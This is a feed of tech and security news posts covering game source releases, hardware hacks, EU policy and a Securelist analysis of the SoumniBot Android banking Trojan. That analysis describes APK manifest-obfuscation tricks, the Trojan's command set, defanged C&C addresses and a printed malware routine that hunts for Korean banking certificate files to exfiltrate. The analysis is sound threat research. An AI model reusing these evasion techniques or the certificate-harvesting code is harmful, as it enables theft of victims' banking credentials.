Cybersecurity & cyberwarfare

2024-04-18 02:00:37

Source Code to the 1999 FPS Game Descent 3 Released

On April 16th of this year, [Kevin Bentley] released the source code to the Sci-Fi FPS game Descent 3. Originally released in 1999 for Windows, it was the third part in the Descent series, following right after the events of Descent 2. In the game, you control a flying ship which you have to guide through both in- and outdoor environments, while shooting at robots that have been infected with an alien virus as you try to save the solar system. It was later also ported to Mac OS and Linux, but was considered a commercial flop due to low sales.

As one of the original developers, [Kevin] explains that one of the goals of this code release is to give the game a second life, by cleaning up the C++ code and using new APIs. Original proprietary audio and video libraries from Interplay were removed, which means that some work is required before one can build a fresh copy of new Descent 3 from this code base. That said, the released code is the latest 1.5 patch level, with the Mac OS and Linux support. Even if the original Descent games weren’t your cup of tea, it’s still great to see games being preserved and updated like this.

Thanks to [Phil Ashby] for the tip.

Cybersecurity & cyberwarfare

2024-04-17 23:00:19

FLOSS Weekly Episode 779: Errata Prevention Specialist

This week Jonathan Bennett and Dan Lynch sit down with Andy Stewart to talk about Andy’s Ham Radio Linux (AHRL)! It’s the Linux distro designed to give hams the tools they need to work with their radios. What’s it like to run a niche Linux distro? How has Andy managed to keep up with this for over a decade? And what’s the big announcement about the project breaking today?

Did you know you can watch the live recording of the show right in the Hackaday Discord? Have someone you’d like use to interview? Let us know, or contact the guest and have them contact us! Next week we’re taping the show on Tuesday, and looking for a guest!

https://play.libsyn.com/embed/episode/id/30874658/height/192/theme/modern/size/large/thumbnail/yes/custom-color/fcab1c/time-start/00:00:00/hide-playlist/yes/download/yes/font-color/271b04

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Cybersecurity & cyberwarfare

2024-04-17 20:00:49

This Go-Kart Rides on a Pallet

Many beginner woodworkers, looking to offset the introductory costs of starting a hobby, will source their wood from pallets. Generally they’re easily found and can be low or no cost, but typically require a bit of work before they’re usable in a project. [Garage Avenger] is looking to do something a little outside of the box with his pallet project, though. He’s using raw pallets as a chassis for a four-speed go-kart, partially for the challenge and excitement and also to one-up a Pinterest post.

Almost immediately, though, the other major downside of working with pallets arose which is that they’re generally built out of low-grade pine which is soft and flexible. Flexibility is generally not a good thing to have in a vehicle frame so plenty of the important parts of this build were strengthened with steel tubing including the rear axle, steering mounts, and a few longitudinal supports to strengthen the overall frame. After working out some kinks with ordering a few of the wrong parts, and mounting the steering box backwards, it was time to test out the four-speed engine (and brakes) on the the go-kart, making it nearly ready for the road.

To complete the build, some tidying of wiring and fuel lines was done, along with improving some of the non-critical parts of the build like the bucket seat. Of course, adding pallet spoilers and body kit puts the finishing touches on the build and the go-kart is finally ready to tear up the local go-kart track and the less-inspiring Pinterest projects. [Garage Avenger] is no stranger to strange vehicle builds, either. Although it’s a bit out of season for most of our northern hemisphere readers now, his jet-powered street sled is still worth a view.

https://www.youtube.com/embed/b3XqcfVq5bE?feature=oembed

Cybersecurity & cyberwarfare

2024-04-17 18:30:50

Compiling and Running Turbo Pascal in the Browser

When a friend of [Lawrence Kesteloot] found a stack of 3.5″ floppy disks, they found that it contained Turbo Pascal code which the two of them had worked on back in the Summer of 1989. Amidst reminiscing about the High School days and watching movies on VHS, [Lawrence] sought a way to bring these graphical applications once more back to life. Not finding an easy way to compile Turbo Pascal code on Mac even back in 2013 when he started the project, he ended up writing a Turbo Pascal compiler in JavaScript, as any reasonable person would do in this situation.
SPIDER.PAS in its full glory. (Credit: Lawrence Kesteloot)
As noted by [Lawrence], the compiler doesn’t implement the full Turbo Pascal 5.5 language, but only the subset that was required to compile and run these applications which they had found on the floppy disks. These include ROSE.PAS and SPIDER.PAS along with three others, and can also be found in the GitHub repository. As can be seen in the online version of the compiler, it captures the feel of programming Pascal in 1989 on the command line.

Naturally, the software situation has changed somewhat over the last decade. We’ve recently seen some promising multi-platform Pascal compilers, and of course you could even run Turbo Pascal in DOSBox or similar. That might make this project seem irrelevant, but being able to write and run Pascal applications in more ways and on more platforms is never a bad thing.

Cybersecurity & cyberwarfare

2024-04-17 18:00:26

VCF East 2024 Was Bigger and Better Than Ever

I knew something had changed before I even paid for my ticket to this year’s Vintage Computer Festival East at the InfoAge Science and History Museum in Wall, New Jersey.

Over the last couple of years, attendance has been growing to the point that parking in the lot directly next to the main entrance has been reserved for only the earliest of risers. That hasn’t described yours truly since the days when I still had what my wife refers to as a “real job”, so that’s meant parking in the overflow lot down the road and walking the half a mile or so back to the main gate. Penance for working on the Internet, let’s call it.

But this time, while walking along the fence that surrounds the sprawling InfoAge campus, I came across an open gate and a volunteer selling tickets. When commenting to her that this was a pleasant surprise compared to the march I’d anticipated, she responded that there had been so many people trying to get into the main entrance that morning that they decided to station her out here to handle the overflow.

I was a few steps past her table and into InfoAge before the implications of this interaction really hit me. Two entrances. How many attendees does there need to be before you setup a secondary ticket booth out by the reserve parking lot just to keep things moving smoothly? Well, I can’t tell you what the exact number is. But after spending the rest of the day walking between all the buildings it took to contain all of the exhibits, talks, and activities this year, I can tell you it’s however many people came to VCF East 2024.

Compared to its relatively humble beginnings, it’s incredible to see what this event has grown into. InfoAge was packed to the rafters, and despite what you might think about a festival celebrating decades old computing hardware, there were plenty of young faces in the crowd. I’m not sure exactly what’s changed, but the whole place was positively jumping. Perhaps it’s partially the generational nostalgia that’s kept Netflix cranking out new seasons of the 1980’s set Stranger Things. I’m sure attention (and attendance) from several well known YouTube personalities have played a big part as well.

Whatever the magic formula that’s turned what was once a somewhat somber retrospective on early desktop computers into a major destination for tech lovers, I’m all for it. Love Live the Vintage Computer Festival!

A Few of My Favorite Things

I’ve only rarely been confused with Julie Andrews, but I’ll do my best here to catalog some of my personal highlights from VCF East 2024.

This is in no way meant to be a comprehensive view of what was on hand over the weekend. I can’t stress enough how absolutely impossible of a task it would be to accurately record everything that was on display — and that’s not including the talks and classes that were happening at the same time. If you’re even remotely interested in vintage computing or rare and unusual tech, this is an event you absolutely need to see for yourself to truly appreciate.

COSMAC Elves on the Shelves

First described in a series of Popular Electronics articles in the back-half of the 1970s, the Elf was a simple homebrew computer based on the RCA 1802 Complementary Symmetry Monolithic Array Computer (COSMAC) chip. In the boilerplate configuration, it used a pair of LED hexadecimal displays for output and eight toggle switches for input. There was no ROM — programs were entered directly into memory using the toggle switches as God intended.

Different kit versions of the computer were sold over the years, and the community has produced countless spin-offs of the basic concept right up to the present day. For their exhibit RCA COSMAC 1802 Computers, Josh Bensadon and Walter Miraglia had a wide collection of these DIY machines on display, as well as a few commercial devices that used the 1802 such as the RCA Studio II.

Modern Art on Vintage Hardware

Although there’s a canvas print of one of Joe Kim’s pieces on the wall in my office, I wouldn’t say that I’m much of an art guy. But there was something about The Plot Thickens: Pen Plotter History and Artistry that I found fascinating. Paul Rickard was demonstrating how he uses modern Python code to generate algorithmic art which he then puts on paper with vintage plotters — machines he lovingly refers to on his website as “absurd and inefficient” in all the right ways.

Crank-Loaded Software

As the name implies, the exhibit 80’s Luggables was intended to show off various mobile computers from the pre-laptop days, such as the Osborne Executive. But honestly, I thought the inclusion of an Altair 8800 and Macintosh SE muddied the waters a bit. Granted the Mac, with its handle and integrated display, might be on the borderline. But the Altair? If that’s portable, then pretty much every other computer ever made must be as well.

That being said, the Altair ended up being perhaps the most interesting piece of the exhibit, as it was fitted with a modern crank-operated paper tape reader. Attendees were able to toggle in the appropriate settings for the Altair’s Multi-Boot Loader (MBL) PROM, crank the tape through the reader, and then enjoy the fruits of their labor by playing the loaded game through the Osborne Executive that was acting as a serial terminal.

It was the sort of hands-on interaction with vintage hardware that you really only get to experience at an event like VCF, and many attendees walked away from their first experience loading software from paper tape with a much greater appreciation for the modern USB flash drive.

Towers of Power

TRS-80 Model II Boards Collection was a simple exhibit, but it certainly caught the eye. Pete Cetinski took 28 different expansion boards (apparently a near-complete set) for Tandy’s classic machine, mounted each one next to a typed up description of what it does, and had them out for display. There was also a Model 16 with the lid off so attendees could better visualize how these boards would have been installed.

The Internet As it Once Was

As somebody who fights works with modern web technology on a daily basis, The Serial Port by Ben Grubbs definitely hit on a personal level. This exhibit was really in two parts — one half was showing off a Cobalt RaQ web server appliance from the 1990s, but a few steps away there was a desktop running an era appropriate version of Microsoft FrontPage that let you bang out a simple web page that would be served up from the RaQ.

This gave attendees a chance to experience what it was like on both sides of the fence back in the days when we thought flashing marquees were a neat idea. Another excellent interactive setup that was getting a lot of attention, especially from some of the younger folks who may not have even been alive when such simplistic sites ruled the net.

The Tip of a Vintage Iceberg

As I said before, there’s simply no way to do an event like Vintage Computer Festival East justice with a post like this. The exhibits took up four separate rooms spread out among multiple rooms, and the consignment area was even larger and more popular than last year.

Instead, consider this post something of a barometer for VCF — and perhaps the larger vintage computing community as a whole. If you had any concerns about this particular technological niche fading away into obscurity, I can give you from my first-hand experience that not only is it alive and well, but it’s growing into something truly remarkable.

Cybersecurity & cyberwarfare

2024-04-17 16:31:59

EU data protection body says Meta’s ‘pay or OK’ model is not OK

The European Data Protection Board opposed Meta's controversial "pay or okay" business model in an opinion published on Wednesday (17 April), saying this binary approach was not compliant with the EU's data privacy rules.

---

https://www.euractiv.com/section/platforms/news/eu-data-protection-body-says-metas-pay-or-ok-model-is-not-ok/

Cybersecurity & cyberwarfare

2024-04-17 16:11:30

Letta’s report aligns with views of major telecoms on market integration

Laying out his vision of a harmonised single market in the telecommunications sector, former Italian prime minister Enrico Letta aligned with some of the talking points by the EU's largest telecom players, according to a draft report seen by Euractiv.

---

https://www.euractiv.com/section/digital/news/lettas-report-aligns-with-views-of-major-telecoms-on-market-integration/

Cybersecurity & cyberwarfare

2024-04-17 13:49:36

I Router TP-Link sono sotto il Fuoco Incrociato degli Attacchi DDoS

Fortinet riferisce che gli aggressori continuano a sfruttare una vulnerabilità vecchia di un anno nei router TP-Link, aggiungendo router a varie botnet per effettuare attacchi DDoS.

La vulnerabilità di command injection CVE-2023-1389 (punteggio CVSS: 8,8) è stata scoperta nel dicembre 2022 all’evento Pwn2Own a Toronto e corretta nel marzo 2023.

Il bug colpisce il popolare modello TP-Link Archer AX21, che è stato a lungo nel mirino degli operatori di botnet.

Fortinet ha assistito a numerosi attacchi che sfruttavano questa falla di sicurezza, tra cui il malware botnet Mirai e Condi. Il codice dannoso consente agli hacker di prendere il controllo dei dispositivi per sferrare attacchi DDoS.
Telemetria Fortinet
Nell’aprile 2023 si è saputo che i criminali informatici hanno approfittato della stessa vulnerabilità per attaccare i router TP-Link situati principalmente nell’Europa orientale e aggiungerli alla botnet Mirai.

Gli esperti chiedono agli utenti di rimanere vigili contro le botnet DDoS e di applicare patch tempestive per proteggere il proprio ambiente di rete dalle infezioni e impedire che i router diventino bot.

L'articolo I Router TP-Link sono sotto il Fuoco Incrociato degli Attacchi DDoS proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 14:30:40

Human-Interfacing Devices: HID over I2C

In the previous two HID articles, we talked about stealing HID descriptors, learned about a number of cool tools you can use for HID hacking on Linux, and created a touchscreen device. This time, let’s talk about an underappreciated HID standard, but one that you might be using right now as you’re reading this article – I2C-HID, or HID over I2C.

HID as a protocol can be tunneled over many different channels. If you’ve used a Bluetooth keyboard, for instance, you’ve used tunneled HID. For about ten years now, I2C-HID has been heavily present in laptop space, it was initially used in touchpads, later in touchscreens, and now also in sensor hubs. Yes, you can expose sensor data over HID, and if you have a clamshell (foldable) laptop, that’s how the rotation-determining accelerometer exposes its data to your OS.

This capacitive touchscreen controller is not I2C-HID, even though it is I2C. By [Raymond Spekking], CC-BY-SA 4.0Not every I2C-connected input device is I2C-HID. For instance, if you’ve seen older tablets with I2C-connected touchscreens, don’t get your hopes up, as they likely don’t use HID – it’s just a complex-ish I2C device, with enough proprietary registers and commands to drive you crazy even if your logic analysis skills are on point. I2C-HID is nowhere near that, and it’s also way better than PS/2 we used before – an x86-only interface with limited capabilities, already almost extinct from even x86 boards, and further threatened in this increasingly RISCy world. I2C-HID is low-power, especially compared to USB, as capable as HID goes, compatible with existing HID software, and ubiquitous enough that you surely already have an I2C port available on your SBC.

In modern world of input devices, I2C-HID is spreading, and the coolest thing is that it’s standardized. The standardization means a lot of great things for us hackers. For one, unlike all of those I2C touchscreen controllers, HID-I2C devices are easier to reuse; as much as information on them might be lacking at the moment, that’s what we’re combating right now as we speak! If you are using a recent laptop, the touchpad is most likely I2C-HID. Today, let’s take a look at converting one of those touchpads to USB HID.

A Hackable Platform

Two years ago, I developed a Framework laptop input cover controller board. Back then, I knew some things about I2C-HID, but not too much, and it kinda intimidated me. Still, I wired up the I2C pins to an I2C port on an RP2040, wired up the INT pin to a GPIO, successfully detected an I2C device on those I2C pins with a single line of MicroPython code, and left sitting on my desk out of dread over converting touchpad data into mouse events – as it turns out, it was way simpler than I thought.

There’s a specification from Microsoft, and it might be your first jumping point. I tried reading the specification, but I didn’t understand HID at the time either, so that didn’t help much. Looking back, the specification is pretty hard to read, regardless. Here’s the deal in the real world.

If you want to get the HID descriptor from an I2C-HID device, you only need to read a block of data from its registers. Receiving reports (HID event packets) is simple, too. When the INT pin goes low, read a block of data from the device – you will receive a HID report. If there’s an RST pin, you will want to bring it down upon bootup for a few hundred milliseconds to reset the device, and you can use it in case your I2C-HID device malfunctions, too.

Now, there are malfunctions, and there definitely will be quirks. Since HID is ubiquitous, there are myriad ways for manufacturers to abuse it. For instance, touchpads are so ubiquitous that Chrome OS has entire layers dealing with their quirks. But here we are, and I have an I2C device connected to an RP2040, previous MicroPython I2C work in hand, some LA captures between the touchpad and the original system stashed away, and I’m ready to send it all commands it needs.

Poking And Probing

To read the descriptor, you can read a block from register 0x20, where the first four bytes define the descriptor version and the descriptor length – counting these four bytes in. When we put this descriptor into the decoder, we will get something like this:

[...]
0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x05, // Usage (Touch Pad)
0xA1, 0x01, // Collection (Application)
0x85, 0x01, // Report ID (1)
0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x22, // Usage (Finger)
0xA1, 0x02, // Collection (Logical)
0x09, 0x47, // Usage (Confidence)
0x09, 0x42, // Usage (Tip Switch)
0x15, 0x00, // Logical Minimum (0)
0x25, 0x01, // Logical Maximum (1)
[...]

That is a HID descriptor for a touchpad alright! Save this descriptor somewhere – while getting it dynamically is tempting, hardcoding it into your firmware also might be a viable decision, depending on which kind of firmware you’ll be adding I2C-HID support into, and, you’ll really want to have it handy as a reference. Put this descriptor into our favourite decoder website, and off we go! Oh, and if you can’t extract the descriptor from the touchpad for whatever reason, you can get it from inside a running OS like I’ve done in the last article – that’s what I ended up doing, because I couldn’t make MicroPython fetch the descriptor properly.
For some reason, Microsoft decided to distribute this spec as a .docx file, something that I immediately abused as a way of stress relief
Take a look at the report IDs – they can be helpful later. All reports coming from the touchpad will have their report ID attached, and it’s good to know just which kinds of events you can actually expect. Also, here’s a challenge – try to spot the reports used for BIOS “simple mouse” functionality, firmware update, touchpad calibration, and any proprietary features!

Now, all that’s left is getting the reports. This is simple too – you don’t even need to read a block from a register, just a block of data from the touchpad. First, you read a single byte, which tells you how many more bytes you need to read to get the actual packet. Then you read a byte once INT is asserted (set low). That means the touchpad has data for you. If your INT doesn’t work for some reason, as it was on my board, you could continuously poll the touchpad in a loop instead, reading a single byte each time, and reading out a full packet when the first byte isn’t 0x00. Then, it’s the usual deal – first byte is the report ID, and all other bytes are the actual report contents. For I2C code of the kind that our last article uses, reading a report works like this:
while True:
try:
l = i2c.readfrom(0x2c, 1)
[0] if l:
d = i2c.readfrom(0x2c, l)
if d[2] != 0x01:
# only forward packets with a specific report ID, discard all others
print("WARNING")
print(l, d)
print("WARNING")
else:
d = d[3:]
print(l, len(d), d)
usb_hid.report(usb_hid.MOUSE_ABS, d)
except OSError:
# touchpad unplugged? retry in a bit
sleep(0.01)

Now, touch the touchpad, and see. Got a report? Wonderful! Haven’t received anything yet? There are a few things to check. First, your touchpad might require a TP_EN pin to be asserted low or high. Also, if your touchpad has a TP_RST pin, you might need to pull it low on startup for a couple hundred milliseconds. Other than that, if your touchpad is from a reasonably popular laptop, see if there’s any references for its quirks in the Linux kernel, or any of the open firmwares out there.

Further Integration

Theoretically, you could write a pretty universal I2C-HID to USB-HID converter seriously easily – that would allow things like USB-connected touchpads on the cheap, just like some people have been doing with PS/2 in the good old days. For me, there’s an interesting question – how do you actually integrate this into a keyboard firmware? There are a few options. For instance, you could write a QMK module for dealing with any sort of I2C-HID device, that’d pass through reports from the touchpad and generate its own reports for keyboard reports. That is a viable option for most of you; for me, C++ is not my friend as much as I’d like it to be.

There’s the MicroPython option we’ve explored last article, and that’s what I’m using for forwarding at the moment. This option needs the descriptor translated into TUSB macros, which took a bit of time, but I could make it work. Soon, USB device support will be added into the new MicroPython release, which will make my translation work obsolete in all the best ways, but it isn’t merged just yet. More importantly, however, there’s no stock keyboard code I could find that’s compatible with this firmware, and as much as it could be educational, I’m not looking into writing my own keyboard scanning code.

Currently, I’m looking into a third option, KMK. A CircuitPython-based keyboard firmware, it should allow things like dynamic descriptor definitions, which lets us save a fair bit of time when iterating on descriptor hacking, especially compared to the MicroPython fork.

All of these options need you to merge keyboard and touchpad descriptors into one, which makes sense. The only caveat is the question of conflicting report IDs between the stock firmware keyboard descriptor and the stock touchpad descriptor. For fixing that, you’d want to rewrite report IDs on the fly – not that it’s complicated, just a single byte substitution, but it’s a good caveat to keep in mind! My touchpad code already does this because the library does automatic report ID insertion, but if yours doesn’t, make sure they’re changed.

Even Easier Reuse

Now, all of this was about tunneling I2C-HID-obtained HID events into USB. Are you using something like a Raspberry Pi? Good news! There’s i2c-hid support in Linux kernel, which only really wants the IRQ GPIO and the I2C address of your I2C device. Basically, all you need to do is to add a device tree fragment and some very minimal data. I don’t have a tutorial for this, but there’s some initial documentation in the kernel tree, and grepping the device tree directory for the overlay name alone should give you a wonderful start.

This article isn’t long, and that’s because of just how easy I2C-HID is to work with. Now, of course, there are quirks – just check out this file for some examples. Still, it’s nothing that you couldn’t figure out with a logic analyzer, and now you can see just how easy this is. I hope that this can help you on your hacking forays, so whenever you next see a laptop touchpad, you know just how easy they can be to wire up, no matter if you’re using a microcontroller or a Raspberry Pi.

Cybersecurity & cyberwarfare

2024-04-17 15:30:56

Custom Dog Door Prevents Culinary Atrocities

Riley, an 8 lb pug, has more beauty than brains, and a palate as unrefined as crude oil. While we hate criticizing others’ interests and tastes, his penchant for eating cat poop needed to stop. After a thorough exploration of a variety of options, including cat food additives that make its excrement taste worse (HOW? WHY? Clearly taste wasn’t the issue!), automatic litter boxes that stow the secretions, and pet doors that authenticate access to the room with the litter box, [Science Buddies] eventually settled on a solution that was amenable to all members of the family.

The trick was in creating a door mechanism with a blacklist of sorts rather than a whitelist. As the cat didn’t like to push the door open itself, the solution needed to have the pet door open by default. A magnet on Riley’s collar would trip a sensor attached to an Arduino that would control servos to swing the door shut immediately if he attempted to access the defecated delights. Of course safety was a consideration with the door swinging in Riley’s face.

We’ve covered a few pet screeners, including one for the same purpose that used IR sensors (but a much bigger dog also named Riley), and a flock of solutions for chickens. We’ve also seen [Science Buddies] in previous posts, so they’re not on the tips line blacklist.

https://www.youtube.com/embed/Djzx54j-2ZU?feature=oembed

Cybersecurity & cyberwarfare

2024-04-17 12:17:06

Bot Forever! metà del traffico web è falso. I bot a breve saranno i padroni di internet

Secondo il rapporto annuale Imperva Bad Bot di Thales , quasi la metà (49,6%) di tutto il traffico Internet nel 2023 proveniva dall’attività dei bot. Si tratta del 2% in più rispetto a un anno prima e si tratta della cifra più alta dal 2013.https://www.securitylab.ru/glossary/thales/

Particolarmente preoccupante è il fatto che il traffico bot dannoso è cresciuto fino al 32% del totale, mentre la quota di utenti reali è in costante calo. Questa tendenza sta avendo un impatto negativo sulle organizzazioni di tutto il mondo e si stima che costi miliardi di dollari ogni anno a causa degli attacchi a siti Web, API e varie applicazioni.

Quali sono i bot incriminati

Il tipo più comune di bot dannosi sono programmi specializzati che eseguono attività specifiche con intenti criminali, come assistere in crimini informatici, furti o campagne fraudolente. Livelli particolarmente elevati della loro attività sono stati registrati in Irlanda, Germania e Messico, mentre negli Stati Uniti si è osservato solo un leggero aumento.

Secondo il rapporto, lo sviluppo di tecnologie, compresa l’intelligenza artificiale generativa, ha contribuito alla crescita dei robot semplici: la loro quota è aumentata dal 33% nel 2022 al 39% nel 2023. Inoltre, gli algoritmi diventano più sofisticati nel tempo.

Ad esempio, nel 2023, il 44% di tutto il traffico bot dannoso proveniva da programmi mascherati da utenti mobili. Tali strumenti utilizzano tipicamente proxy residenziali e mobili per nascondere le loro vere origini ed evitare il rilevamento.

Il rapporto documenta inoltre l’ascesa di bot più avanzati in grado di imitare il comportamento di persone reali e di aggirare con successo le misure di sicurezza. Nella maggior parte dei casi hanno preso di mira i settori del diritto, del governo, dell’intrattenimento e dei servizi finanziari.

I bot supereranno a breve il traffico generato dagli esseri umani

Separatamente, vale la pena notare la crescita degli attacchi di account takeover (ATO), che sono diventati più frequenti del 10%. Quasi la metà di questi incidenti erano diretti contro le API. Le vittime più frequenti sono state aziende del settore finanziario, turistico ed economico.

“I bot automatizzati supereranno presto la quota di traffico Internet proveniente dagli esseri umani, cambiando radicalmente il modo in cui le organizzazioni costruiscono e proteggono le proprie risorse web”, avverte Nanhi Singh, direttore generale della sicurezza delle applicazioni presso Imperva .

Per contrastare la crescente minaccia, le organizzazioni devono essere più vigili e implementare difese efficaci, in particolare contro gli attacchi di abuso delle API che possono portare alla compromissione degli account e al furto di dati.

L'articolo Bot Forever! metà del traffico web è falso. I bot a breve saranno i padroni di internet proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 11:00:50

Getting Started with Radio Astronomy

There are many facets to being a radio hobbyist, but if you’ve ever had the urge to dabble in radio astronomy, check out “The Novice’s Guide to Amateur Radio Astronomy,” a presentation at the 2024 conference of the Society of Amateur Radio Astronomers. In that presentation (see the video below), [Nathan Butts] covers everything from why you should take up the hobby, how to set up a software defined radio (SDR) receiver, and how to repurpose old computers. This is just one of a series of videos recently posted from the conference — check out their channel to see them all.

Unlike optical astronomy, you can listen to the universe by radio during the day or night, rain or shine. You don’t need a dark sky, although these days, a quiet radio location might be hard to find. [Nathan] also points out that some people just want to crunch data collected by others, and that’s fun, too. There are many ways to get involved from designing hardware, writing software, or — of course — just listening.

It has never been easier to get involved. Cheap software-defined radios are perfect for this sort of work, and we all have massive computers and scores of small data-collection computers. Maybe you’ll be the next person to hear a Wow signal. If you are worried about fielding an antenna, many people repurpose satellite dishes.

https://www.youtube.com/embed/uz15GmR_aXc?feature=oembed

Cybersecurity & cyberwarfare

2024-04-17 11:19:57

European space industry needs a single market approach, recommends Letta report

The EU space market should be integrated, because the European space industry is no longer adequate to compete in the current global space economy, Italian MP Enrico Letta writes in his draft full report as seen by Euractiv.

---

https://www.euractiv.com/section/industrial-strategy/news/european-space-industry-needs-a-single-market-approach-recommends-letta-report/

Cybersecurity & cyberwarfare

2024-04-17 10:00:28

SoumniBot: the new Android banker’s unique techniques

The creators of widespread malware programs often employ various tools that hinder code detection and analysis, and Android malware is no exception. As an example of this, droppers, such as Badpack and Hqwar, designed for stealthily delivering Trojan bankers or spyware to smartphones, are very popular among malicious actors who attack mobile devices. That said, we recently discovered a new banker, SoumniBot, which targets Korean users and is notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest.

SoumniBot obfuscation: exploiting bugs in the Android manifest extraction and parsing procedure

Any APK file is a ZIP archive with AndroidManifest.xml in the root folder. This file contains information about the declared components, permissions and other app data, and helps the operating system to retrieve information about various app entry points. Just like the operating system, the analyst starts by inspecting the manifest to find the entry points, which is where code analysis should start. This is likely what motivated the developers of SoumniBot to research the implementation of the manifest parsing and extracion routine, where they found several interesting opportunities to obfuscate APKs.

Technique 1: Invalid Compression method value

This is a relatively well-known technique used by various types of malware including SoumniBot and associated with the way manifests are unpacked. In libziparchive library, the standard unarchiving function permits only two Compression method values in the record header: 0x0000 (STORED, that is uncompressed) и 0x0008 (DEFLATED, that is compressed with deflate from the zlib library), or else it returns an error.

libziparchive unarchiving algorithm

Yet, instead of using this function, the developers of Android chose to implement an alternate scenario, where the value of the Compression method field is validated incorrectly.

Manifest extraction procedure

If the APK parser comes across any Compression method value but 0x0008 (DEFLATED) in the APK for the AndroidManifest.xml entry, it considers the data uncompressed. This allows app developers to put any value except 8 into Compression method and write uncompressed data. Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed. The image below illustrates the way the technique is executed in the file b456430b4ed0879271e6164a7c0e4f6e.

Invalid Compression method value followed by uncompressed data

Technique 2: Invalid manifest size

Let’s use the file 0318b7b906e9a34427bf6bbcf64b6fc8 as an example to review the essence of this technique. The header of AndroidManifest.xml entry inside the ZIP archive states the size of the manifest file. If the entry is stored uncompressed, it will be copied from the archive unchanged, even if its size is stated incorrectly. The manifest parser ignores any overlay, that is information following the payload that’s unrelated to the manifest. The malware takes advantage of this: the size of the archived manifest stated in it exceeds its actual size, which results in overlay, with some of the archive content being added to the unpacked manifest. Stricter manifest parsers wouldn’t be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors.

The stated size of the manifest is much larger than its actual size

Note that although live devices interpret these files as valid, apkanalyzer, Google’s own official utility for analyzing assembled APKs, cannot handle them. We have notified Google accordingly.

Technique 3: Long namespace names

The SoumniBot malware family, for example the file fa8b1592c9cda268d8affb6bceb7a120, has used this technique as well. The manifest contains very long strings, used as the names of XML namespaces.

Very long strings in the manifest…

…used as namespace names

Manifests that contain strings like these become unreadable for both humans and programs, with the latter may not be able to allocate enough memory to process them. The manifest parser in the OS itself completely ignores namespaces, so the manifest is handled without errors.

What’s under the obfuscation: SoumniBot’s functionality

When started, the application requests a configuration with two parameters, mainsite и mqtt, from the server, whose address being a hardcoded constant.

Parameter request

Both parameters are server addresses, which the malware needs for proper functioning. The mainsite server receives collected data, and mqtt provides MQTT messaging functionality for receiving commands. If the source server did not provide these parameters for some reason, the application will use the default addresses, also stored in the code.

After requesting the parameters, the application starts a malicious service. If it cannot start or stops for some reason, a new attempt is made every 16 minutes. When run for the first time, the Trojan hides the app icon to complicate removal, and then starts to upload data in the background from the victim’s device to mainsite every 15 seconds. The data includes the IP address, country deduced from that, contact and account lists, SMS and MMS messages, and the victim’s ID generated with the help of the trustdevice-android library. The Trojan also subscribes to messages from the MQTT server to receive the commands described below.

#	Description	Parameters
0	Sends information about the infected device: phone number, carrier, etc., and the Trojan version, followed by all of the victim’s SMS messages, contacts, accounts, photos, videos and online banking digital certificates.	–
1	Sends the victim’s contact list.	–
2	Deletes a contact on the victim’s device.	data: the name of the contact to delete
3	Sends the victim’s SMS and MMS messages.	–
4	A debugging command likely to be replaced with sending call logs in a new version.	–
5	Sends the victim’s photos and videos.	–
8	Sends an SMS message.	data: ID that the malware uses to receive a message to forward. The Trojan sends the ID to mainsite and gets message text in return.
24	Sends a list of installed apps.	–
30	Adds a new contact on the device.	name: contact name; phoneNum: phone number
41	Gets ringtone volume levels.	–
42	Turns silent mode on or off.	data: a flag set to 1 to turn on silent mode and to 0 to turn it off
99	Sends a pong message in response to an MQTT ping request.	–
100	Turns on debug mode.	–
101	Turns off debug mode.	–

The command with the number 0 is worth special mention. It searches, among other things, external storage media for .key and .der files that contain paths to /NPKI/yessign.
public static List getAllBankingKeys(Context context) {
List list = new ArrayList();
Cursor cursor = context.getContentResolver().query(MediaStore.Files.getContentUri("external"),
new String[]{"_id", "mime_type", "_size", "date_modified", "_data"},
"(_data LIKE \'%.key\' OR _data LIKE \'%.der\')", null, null);
int index = cursor == null ? 0 : cursor.getColumnIndexOrThrow("_data");
if (cursor != null) {
while (cursor.moveToNext()) {
String s = cursor.getString(index);
If (!s.contains("/NPKI/yessign")) {
continue;
}
Logger.log("path is:" + s);
list.add(s);
break;
}
cursor.close();
}
return list;
}
If the application finds files like that, it copies the directory where they are located into a ZIP archive and sends it to the C&C server. These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions. This technique is quite uncommon for Android banking malware. Kaspersky security solutions detect SoumniBot despite its sophisticated obfuscation techniques, and assign to it the verdict of Trojan-Banker.AndroidOS.SoumniBot.

Conclusion

Malware creators seek to maximize the number of devices they infect without being noticed. This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code.

We have detailed the techniques used by this Trojan, so that researchers around the world are aware of the tactics, which other types of malware might borrow in the future. Besides the unconventional obfuscation, SoumniBot is notable for stealing Korean online banking keys, which we rarely observe in Android bankers. This feature lets malicious actors empty unwitting victims’ wallets and circumvent authentication methods used by banks. To avoid becoming a victim of malware like that, we recommend using a reliable security solution on your smartphone to detect the Trojan and prevent it from being installed despite all its tricks.

Indicators of compromise

MD5
0318b7b906e9a34427bf6bbcf64b6fc8
00aa9900205771b8c9e7927153b77cf2
b456430b4ed0879271e6164a7c0e4f6e
fa8b1592c9cda268d8affb6bceb7a120

C&C
https[://]google.kt9[.]site
https[://]dbdb.addea.workers[.]dev

---

https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/

Cybersecurity & cyberwarfare

2024-04-17 08:14:21

Aumento del 85.7% del fenomeno Ransomware in Italia. Lo riporta il Cyber Think Tank Assintel

Il report annuale sullo stato di salute della cyber security, pubblicato dal Cyber Think Tank di Assintel, evidenzia un aumento preoccupante degli attacchi informatici nel corso del 2023. I dati raccolti indicano un notevole incremento del 184% nel numero degli attacchi rispetto all’anno precedente, con un totale di 7.068 individuati e classificati durante l’anno.

